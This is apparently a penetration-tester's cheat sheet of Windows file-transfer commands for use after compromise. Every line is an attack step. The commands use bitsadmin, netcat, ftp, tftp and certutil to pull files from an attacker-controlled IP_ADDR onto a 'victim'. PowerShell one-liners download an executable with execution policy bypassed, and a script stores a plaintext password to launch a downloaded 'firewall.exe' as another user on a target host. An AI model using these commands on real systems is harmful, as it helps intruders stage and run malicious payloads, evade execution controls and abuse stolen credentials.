Windows Transfer Methods
bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\\output\\path (Works on Windows 7/Windows Server 2000+)
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
ftp -s:input.txt
tftp -i get file /path/on/victim
powershell.exe -exec bypass -Command "& {iex((New-Object System.Net.WebClient).DownloadFile('http://IP_ADDR:PORT/FILE','C:\\Users\\user\\AppData\\Local\\ack.exe'));}"
certutil -urlcache -split -f "http://IP_ADDR/FILE" FILENAME
PowerShell Transfer
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://IP_ADDR/FILE" >> wget.ps1
echo $file = "FILE" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>
PowerShell Transfer as another user (note: the password is written to execute.ps1 in plain text)
echo $secpasswd = ConvertTo-SecureString "insert_plaintext_password_here" -AsPlainText -Force > execute.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential("username", $secpasswd) >> execute.ps1
echo $computer = "target_host" >> execute.ps1
echo [System.Diagnostics.Process]::Start("C:\\Users\\user\\Downloads\\firewall.exe", "", $mycreds.Username, $mycreds.Password, $computer) >> execute.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>